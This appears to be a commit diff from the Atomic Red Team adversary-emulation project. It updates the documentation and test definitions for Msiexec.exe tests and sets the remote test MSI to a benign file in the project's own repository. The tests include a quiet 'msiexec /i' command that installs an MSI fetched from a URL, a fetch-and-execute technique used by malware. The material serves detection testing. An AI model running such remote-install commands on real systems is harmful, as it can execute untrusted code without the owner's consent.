Generate docs from job=validate_atomics_generate_docs branch=master
This commit is contained in:
parent
74e33cac01
commit
c429ff1f08
@@ -161,7 +161,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Msiexec.exe - Execute Local MSI file
|
||||
Execute arbitrary MSI file. Commonly seen in application installation.
|
||||
Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
@@ -202,7 +202,7 @@ Write-Host "You must provide your own MSI"
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Msiexec.exe - Execute Remote MSI file
|
||||
Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.
|
||||
Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
@@ -212,7 +212,7 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| msi_payload | MSI file to execute | String | http://site.com/file.msi|
|
||||
| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
+8
-4
@@ -12089,6 +12089,7 @@ defense-evasion:
|
||||
'
|
||||
- name: Msiexec.exe - Execute Local MSI file
|
||||
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
|
||||
The MSI opens notepad.exe when sucessfully executed.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
@@ -12110,7 +12111,8 @@ defense-evasion:
|
||||
'
|
||||
- name: Msiexec.exe - Execute Remote MSI file
|
||||
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
|
||||
in application installation, commonly seen in malware execution.
|
||||
in application installation, commonly seen in malware execution. The MSI opens
|
||||
notepad.exe when sucessfully executed.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
@@ -12119,7 +12121,7 @@ defense-evasion:
|
||||
msi_payload:
|
||||
description: MSI file to execute
|
||||
type: String
|
||||
default: http://site.com/file.msi
|
||||
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: 'msiexec.exe /q /i "#{msi_payload}"
|
||||
@@ -24307,6 +24309,7 @@ execution:
|
||||
'
|
||||
- name: Msiexec.exe - Execute Local MSI file
|
||||
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
|
||||
The MSI opens notepad.exe when sucessfully executed.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
@@ -24328,7 +24331,8 @@ execution:
|
||||
'
|
||||
- name: Msiexec.exe - Execute Remote MSI file
|
||||
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
|
||||
in application installation, commonly seen in malware execution.
|
||||
in application installation, commonly seen in malware execution. The MSI opens
|
||||
notepad.exe when sucessfully executed.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
@@ -24337,7 +24341,7 @@ execution:
|
||||
msi_payload:
|
||||
description: MSI file to execute
|
||||
type: String
|
||||
default: http://site.com/file.msi
|
||||
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: 'msiexec.exe /q /i "#{msi_payload}"
|
||||
|
||||
Reference in New Issue
Block a user